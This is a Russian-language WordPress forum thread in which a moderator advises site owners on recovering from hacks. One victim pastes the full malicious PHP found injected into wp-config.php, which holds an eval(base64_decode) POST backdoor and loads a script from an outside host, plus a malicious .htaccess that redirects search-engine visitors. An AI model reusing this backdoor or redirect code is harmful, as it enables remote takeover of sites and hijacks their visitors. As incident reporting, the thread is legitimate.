Модератор
Юрій
(@yube)
Для начала надо найти больное место: троян на Вашем компе, уязвимый плагин, Тема с закладкой, проблемы у хостера и т.д.
Дальнейшие действия зависят от уязвимости. В общем случае: поменять все пароли, удалить все скрипты на сервере и залить заведомо чистые, обзавестись каким-нибудь «инструментом слежения» (парочка описана у меня в блоге).
Юрий, а можно поподробнее? Что за скрипты? Как вообще все это дело проверить?
Вот что хостер предлагает:
Мы можем провести диагностику Вашего сервера,а так же просканировать на наличие Rootkitов,стоимость данной услуги составляет 25$.
Поменял пароль в ISPmanager, FTP, пароль от MySQL. Помогите с решением, в долгу не останусь. Если можно, напишите мне в ICQ 428-068-888
Модератор
Юрій
(@yube)
а можно поподробнее?
Подробнее потянет на приличную монографию.
стоимость данной услуги составляет 25$.
Демпингуют 🙂 Нормальный аудит безопасности стоит на один-два порядка больше.
Если у Вас на рабочем компе стоит винда, то для начала проверьте её двумя-тремя антивирусами, лучше «автономными» Live-CD. Если троян в машине, то новый пароль будет известен злоумышленнику сразу же, как только поменяете.
Нет у меня живой аськи.
Да, а как понимать фразу «Вашего сервера»? У Вас выделенный сервер?
Слова хостера:
Данная проблема, возникает из за имеющихся уязвимостей в Ваших скриптах.
Вы можете заказать проверку скриптов на наличие уязвимостей у WEB разработчиков.
Мы как хостинг провайдер,предоставляем Вам площадку для размещения проектов и не можем нести ответственность за корректность работы Ваших скриптов.
Да, VPS у меня. Виртуальный хостинг все мои сайты уже не тянул. Так они мне говорили.
Юрий, а где мы можем с вами поговорить?
Хочу услышать ответ на такой вопрос: Если на компе нет вируса и если я поменял пароль от ФТП и от ISPmanager — возможно ли такое что прекратится такого рода атака?
Заранее спасибо за ответ.
Модератор
Юрій
(@yube)
За VPS я даже браться не буду.
Поговорить можем в email: bela(at)portal.kharkov.ua
Модератор
Юрій
(@yube)
Если на компе нет вируса и если я поменял пароль от ФТП и от ISPmanager — возможно ли такое что прекратится такого рода атака?
Может, если: 1.для взлома использовался ftp и 2.враги не оставили на сайте «закладку».
Я смотрю, у Вас на «профильном» сайте стоит WP 3.1.1, а последний в линейке — 3.1.4. Стоит обновиться.
Почитал ветку и хочу продолжить и рассказать свой случай: Оба моих ВордПрессовских сайта легли.. Набираю название сайта а там редирект на ….ru/. Причем такой редирект проявлял себя только в Мозиле, в Опере и ИЕ — все открывалось. Мне это не понравилось и я начал рыть. После недельных усилий выяснил:
1) какой-то скрипт прописывает следующий код в wp-config.php (в первой строке после стандартной <?p…?>:
<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
2) в корне создается файл indexs.php и wp-config.php.htm — насколько я понял это вообще «левые» файлы которых быть не должно..
После долгих усилий мое решение было следующее — пришлось сносить ВСЕ проекты на хостинге под моим акком. Залил оригинальные инсталяшки и установил все проекты заново!
Во общем пришлось повозиться..Просмотрел логи но так и не смог понять в чем был причина (может кто-то пояснит?). Чтобы подобного не случилось вновь я разрешил доступ по фтп только со своего IP. Но как защититься от взлома через html ? И можно ли еще что-то предпринять для защиты ??
буду признателен за советы!!!
…забыл добавить! Эта зараза постоянно создавала свой .htaccess в котором присутствовал код :
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)
RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)
RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L]
</IfModule>
т.е. редирект был на всякие там http://brendarco.ru и т.д.. Убивать все эти .htaccess не удавалось. Они создавались вновь!!
Кстати! вопрос к спецам — как тот же .htaccess или другие файлы могут быть модифицированны при установленных правах 644 ?? — запрет на запись..
А теперь просто в index.php iframe код вставляют…
ну так index.php ведь тоже защещен от записи!!! как ?
Модератор
Юрій
(@yube)
Кстати! вопрос к спецам — как тот же .htaccess или другие файлы могут быть модифицированны при установленных правах 644 ?? — запрет на запись..
Зависит от того, с чьими правами хозяйничает взломщик. Во-первых, на половине хостингов Апач выполняется от имени владельца сайта (это те, где не надо ставить 777 на uploads, где ,htaccess создается движком). Во-вторых, половина (если не больше) взломов осуществляется через ftp по ворованным паролям владельца сайта. В-третьих, в связи с массовым появлением говнохостеров и столь же массовым выпихиванием юзеров на VPS/VDS без объяснения, что без нормального сисадмина сервер превращается в одну большую дыру, всё чаще встречаются взломы самой системы, а для рута юзерские права не помеха.
